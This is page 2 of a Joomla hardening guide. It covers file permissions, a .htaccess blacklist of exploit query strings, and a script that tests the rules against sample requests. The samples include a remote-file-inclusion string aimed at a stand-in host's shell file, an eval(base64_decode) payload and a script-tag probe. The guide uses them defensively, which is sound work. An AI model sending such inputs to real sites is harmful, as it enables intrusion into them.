Security guide for Joomla CMS (page 2)
3. Files and directories chmod'ed with too many permissions
NEVER chmod 777! Grant the fewest permissions that still let the site run:
Folders 755
Files 644
configuration.php (Joomla's config file) and index.php 444
Without write permission there is no defacement that replaces your index files: code running as the web server can read them but not overwrite them. Two caveats. The permission bits only help when the web server runs as a user that does not own the files; with mod_php and files owned by the web server user, a compromised script can simply chmod them back. And a 444 configuration.php has to be made writable again (644) for as long as you save changes in Global Configuration, then set back. Protect your administrator folder with HTTP authentication (a .htaccess plus .htpasswd pair), using a generator like this one.
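The scheme above as a script, added here as an example and not part of the original guide: it applies 755/644/444 to a Joomla tree, audits for the world-writable leftovers that a `chmod 777` leaves behind, and counts the entries owned by the web-server user, which is the case where the bits give no protection at all. The path argument, the list of files pinned to 444 and the user name `www-data` are assumptions for this example; adjust them to your host.

```shell
#!/bin/sh
# Added example, not part of the original guide: apply the permission scheme
# above to a Joomla tree and audit it afterwards. The path argument, the
# list of files pinned to 444 and the web-server user name are assumptions
# for this example; adjust them to your host.
set -u

# Set 755 on every directory, 644 on every file, then pin the config file and
# the front-door scripts to 444. Order matters: the 444 step runs last.
harden_perms() {
    root=$1
    find "$root" -type d -exec chmod 755 {} +
    find "$root" -type f -exec chmod 644 {} +
    for f in configuration.php index.php administrator/index.php; do
        if [ -f "$root/$f" ]; then
            chmod 444 "$root/$f"
        fi
    done
}

# Print every world-writable entry below $1 (the 777 mistake and friends);
# return 1 if any exist so the function can gate a deploy script.
audit_world_writable() {
    hits=$(find "$1" -perm -0002)
    if [ -n "$hits" ]; then
        printf 'World-writable entries under %s:\n%s\n' "$1" "$hits"
        return 1
    fi
    return 0
}

# Count entries below $1 owned by user $2. Run it with the web-server user
# (www-data, apache, nobody ...): if the count is not zero, the permission
# bits above are no protection, because code running as that user can chmod
# the files back.
count_owned_by() {
    find "$1" -user "$2" | wc -l | tr -d ' '
}

# Stand-alone usage: sh harden_joomla_perms.sh /var/www/joomla www-data
if [ "${1:-}" ]; then
    harden_perms "$1"
    audit_world_writable "$1"
    echo "entries owned by ${2:-www-data}: $(count_owned_by "$1" "${2:-www-data}")"
fi
```

Run it as the file owner (or root), never as the web-server user. When `count_owned_by` reports a non-zero number for the web-server user, fix ownership (chown to a deploy user) before trusting any of the mode bits.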
To block many of the code-injection techniques aimed at Joomla, put a .htaccess file with this content in the site root, or append it to your current one. Be clear about what it is: a blacklist of known attack strings applied to the query string only. It never sees POST bodies, most of its patterns are case-sensitive (only the script-tag and CONFIG_EXT conditions carry [NC], so for example BASE64_ENCODE( passes while base64_encode( is blocked), and it cannot stop a variant it does not list. Keep Joomla and its extensions patched and register_globals off; treat these rules as an extra layer, not as the fix.
```apache
## Can be commented out if it causes errors (Options is rejected in .htaccess
## unless AllowOverride permits it; mod_rewrite in .htaccess needs FollowSymLinks)
Options FollowSymLinks
#
# mod_rewrite in use
RewriteEngine On
########## Begin - Rewrite rules to block out some common exploits
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to pass base64_encode'd code via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
# RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script that tries to set CONFIG_EXT (com_extcal2 issue)
RewriteCond %{QUERY_STRING} CONFIG_EXT(\[|\%20|\%5B).*= [NC,OR]
# Block out any script that tries to set sbp or sb_authorname via URL (simpleboard)
RewriteCond %{QUERY_STRING} sbp(=|\%20|\%3D) [OR]
RewriteCond %{QUERY_STRING} sb_authorname(=|\%20|\%3D)
# Answer every blocked request with 403 Forbidden. With the F flag the
# substitution (index.php) is ignored, so nothing is sent to the homepage.
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits
```
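To see what these conditions actually catch before trusting them, the script below replays them offline with grep. It is an added example, not part of the guide or of Joomla: the patterns are transcribed from the RewriteConds above (grep -Ei where the condition carries [NC], grep -E otherwise), and the sample query strings are constructed for this demonstration, including two that slip through because the base64_encode condition is case-sensitive and names only base64_encode.

```shell
#!/bin/sh
# Added example, not part of the original guide: replay the query-string
# conditions above offline with grep -E, so you can see what they catch and
# what they let through. The patterns are transcribed from the RewriteConds
# (grep -Ei where the condition has [NC], grep -E otherwise); the sample
# query strings are constructed for this demonstration.

# Return 0 if the rule set would answer 403 for this raw query string, 1 if
# the request would reach Joomla.
blocked_by_rules() {
    q=$1
    printf '%s' "$q" | grep -Eq  'mosConfig_[a-zA-Z_]{1,21}(=|%3D)'   && return 0
    printf '%s' "$q" | grep -Eq  'base64_encode.*\(.*\)'              && return 0
    printf '%s' "$q" | grep -Eiq '(<|%3C).*script.*(>|%3E)'           && return 0
    printf '%s' "$q" | grep -Eq  '_REQUEST(=|\[|%[0-9A-Z]{0,2})'      && return 0
    printf '%s' "$q" | grep -Eiq 'CONFIG_EXT(\[|%20|%5B).*='          && return 0
    printf '%s' "$q" | grep -Eq  'sbp(=|%20|%3D)'                     && return 0
    printf '%s' "$q" | grep -Eq  'sb_authorname(=|%20|%3D)'           && return 0
    return 1
}

# Classify query strings read one per line from stdin: prints BLOCK or PASS
# in front of each.
classify() {
    while IFS= read -r q; do
        if blocked_by_rules "$q"; then
            printf 'BLOCK %s\n' "$q"
        else
            printf 'PASS  %s\n' "$q"
        fi
    done
}

# Constructed samples. The first five are the request shapes the rules were
# written for. The last three pass untouched: the function name in a
# different case (PHP function names are case-insensitive, the regex is not),
# base64_decode (the rule names only base64_encode), and an ordinary request.
samples() {
    cat <<'EOF'
option=com_content&mosConfig_absolute_path=http://evil.example/shell.txt?
id=1&x=base64_encode(foo)
search=%3Cscript%3Ealert(1)%3C/script%3E
id=1&_REQUEST[option]=com_users
sbp=1&sb_authorname=x
id=1&X=BASE64_ENCODE(foo)
id=1&x=eval(base64_decode(foo))
option=com_content&task=view&id=1
EOF
}

samples | classify
```

Extend `samples` with strings taken from your own access log (the query part of the request line) to check whether a given attack would have been caught; anything the script marks PASS reaches Joomla untouched, and so does everything sent in a POST body, which this rule set never inspects.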
See these threads discussing this issue:
Thread 1 
Thread 2 